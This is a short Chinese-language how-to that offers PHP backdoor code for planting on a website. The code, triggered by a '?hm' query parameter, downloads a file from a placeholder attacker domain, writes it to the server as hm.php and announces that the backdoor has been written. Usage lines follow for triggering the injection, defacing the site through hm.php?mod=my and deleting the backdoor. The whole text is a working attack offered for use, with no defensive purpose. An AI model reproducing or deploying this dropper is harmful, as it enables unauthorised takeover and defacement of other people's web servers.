后门代码：

if(isset($_GET['hm'])){file_put_contents('hm.php',file_get_contents('http://你的域名/hm.txt'));
    exit("<script language='javascript'>alert('后门写入成功！');window.location.href='./hm.php';</script>");
}

注入教程：

文件名称/?hm

挂黑代码：

文件路径/hm.php?mod=my

删除后门：

文件路径/hm.php?mod=del